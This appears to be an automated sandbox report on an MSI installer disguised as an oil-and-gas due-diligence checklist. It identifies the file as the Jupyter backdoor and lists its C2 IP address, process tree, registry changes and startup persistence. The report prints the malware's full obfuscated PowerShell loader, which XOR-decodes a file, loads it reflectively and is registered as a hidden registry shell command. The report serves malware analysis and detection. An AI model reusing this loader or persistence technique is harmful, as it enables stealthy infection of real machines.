Analysis
- max time kernel: 64s
- max time network: 128s
- platform: windows10_x64
- resource: win10v20210408
- submitted: 16-09-2021 08:31
Static task
static1
Behavioral task
behavioral1
Sample
Due-Diligence-Checklist-For-Oil-And-Gas-Properties.msi
Resource
win7-en
windows7_x64
0 signatures
0 seconds
General
Malware Config
Extracted
Family: jupyter
Version: SP-13
C2: http://45.42.201.248
Signatures
Jupyter Backdoor/Client Payload 1 IoCs
resource | yara_rule
behavioral2/memory/1280-1911-0x00000000096A0000-0x00000000096A8000-memory.dmp | family_jupyter
Blocklisted process makes network request 3 IoCs
flow | pid | Process
6 | 1832 | msiexec.exe
8 | 1832 | msiexec.exe
9 | 1280 | powershell.exe
Executes dropped EXE 1 IoCs
pid | Process
1408 | MSI502A.tmp
Drops startup file 1 IoCs
description | ioc | Process
File created | C:\Users\Admin\AppData\Roaming\MICROSofT\wINdOwS\staRt MEnU\PROgRaMs\staRTup\abfe9e9acdd4c183ad426abc88479.lnK | powershell.exe
Loads dropped DLL 2 IoCs
pid | Process
920 | MsiExec.exe
920 | MsiExec.exe
Enumerates connected drives 3 TTPs 48 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor | MSI502A.tmp
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\ProcessorNameString | MSI502A.tmp
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | MSI502A.tmp
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | MSI502A.tmp
Enumerates system info in registry 2 TTPs 3 IoCs
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | MSI502A.tmp
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion | MSI502A.tmp
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | MSI502A.tmp
Modifies registry class 7 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\mlsquesojuhywrl\shell\open\command\ = "PowersHElL -wINDOwStYLe HIdDEn -ep BypASS -coMMaNd \"$ae898dcfc24431a74b3c1ba635282='QHJSKEleT2wzWUB9cmk4QHJIfThAVTVQIUB3MWJmQFJnXm9AfThgd0B7XiNlQHx1dlFAc15VM0ByOSthXlFFPThAe0BzKEB1PDY+QH5GUzRAcT4lSUB0ZFRVQHd1YkReUzZlRF5QK15UXjFaZFRAfGM7MF5NYW5mQDFlUXl0RmV5XlFmaGNAVj1zeDwtV0deek9rZTZ1KHFWQHpNUylzblh2SkptNygmUGsmVz1WbXlZcU9rQ083VHdYWEEmZ3JELWhocFk=';$a84b042eeeb4a4a8a2216c8f5b3aa=[SySTem.io.file]::READAllBytES('C:\\Users\\Admin\\AppData\\Roaming\\MiCrOsoFt\\UNpFKteogOCmxA\\AtNbGjDTsZyadeKgW.yweDfhMRVGQt');foR($ad6c4e2f3ef4f0a84c8f0bdcc186c=0;$ad6c4e2f3ef4f0a84c8f0bdcc186c -LT $a84b042eeeb4a4a8a2216c8f5b3aa.CounT;){FOR($abc7feb99fa43dba4479c37e0a07a=0;$abc7feb99fa43dba4479c37e0a07a -lt $ae898dcfc24431a74b3c1ba635282.lENgth;$abc7feb99fa43dba4479c37e0a07a++){$a84b042eeeb4a4a8a2216c8f5b3aa[$ad6c4e2f3ef4f0a84c8f0bdcc186c]=$a84b042eeeb4a4a8a2216c8f5b3aa[$ad6c4e2f3ef4f0a84c8f0bdcc186c] -bXOr $ae898dcfc24431a74b3c1ba635282[$abc7feb99fa43dba4479c37e0a07a];$ad6c4e2f3ef4f0a84c8f0bdcc186c++;iF($ad6c4e2f3ef4f0a84c8f0bdcc186c -gE $a84b042eeeb4a4a8a2216c8f5b3aa.COuNT){$abc7feb99fa43dba4479c37e0a07a=$ae898dcfc24431a74b3c1ba635282.leNgTh}}};[SYstEm.REfleCTiOn.aSSembLY]::LoaD($a84b042eeeb4a4a8a2216c8f5b3aa);[MArS.DeImos]::iNtErAct()\"" powershell.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\.sqelcvlfmtwnomrscuh powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\.sqelcvlfmtwnomrscuh\ = "mlsquesojuhywrl" powershell.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\mlsquesojuhywrl\shell\open\command powershell.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\mlsquesojuhywrl powershell.exe Key created 
\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\mlsquesojuhywrl\shell powershell.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\mlsquesojuhywrl\shell\open powershell.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid | Process
1280 | powershell.exe
1280 | powershell.exe
1280 | powershell.exe
Suspicious use of AdjustPrivilegeToken 64 IoCs
Suspicious use of FindShellTrayWindow 1 IoCs
pid | Process
1832 | msiexec.exe
Suspicious use of WriteProcessMemory 8 IoCs
description | pid | Process | procid_target
PID 2280 wrote to memory of 920 | 2280 | msiexec.exe | 70
PID 2280 wrote to memory of 920 | 2280 | msiexec.exe | 70
PID 2280 wrote to memory of 920 | 2280 | msiexec.exe | 70
PID 920 wrote to memory of 1280 | 920 | MsiExec.exe | 71
PID 920 wrote to memory of 1280 | 920 | MsiExec.exe | 71
PID 920 wrote to memory of 1280 | 920 | MsiExec.exe | 71
PID 1832 wrote to memory of 1408 | 1832 | msiexec.exe | 73
PID 1832 wrote to memory of 1408 | 1832 | msiexec.exe | 73
Processes
C:\Windows\system32\msiexec.exe
msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\Due-Diligence-Checklist-For-Oil-And-Gas-Properties.msi
- Blocklisted process makes network request
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1832
    C:\Users\Admin\AppData\Local\Temp\MSI502A.tmp
    "C:\Users\Admin\AppData\Local\Temp\MSI502A.tmp"
    - Executes dropped EXE
    - Checks processor information in registry
    - Enumerates system info in registry
    PID:1408
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2280
    C:\Windows\syswow64\MsiExec.exe
    C:\Windows\syswow64\MsiExec.exe -Embedding E3DA67FD23A1075CF4C32F37B6E2D57C C
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:920
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss50B9.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msi5096.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scr5097.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scr50A8.txt" -propSep " :<->: " -testPrefix "_testValue."
        - Blocklisted process makes network request
        - Drops startup file
        - Modifies registry class
        - Suspicious behavior: EnumeratesProcesses
        PID:1280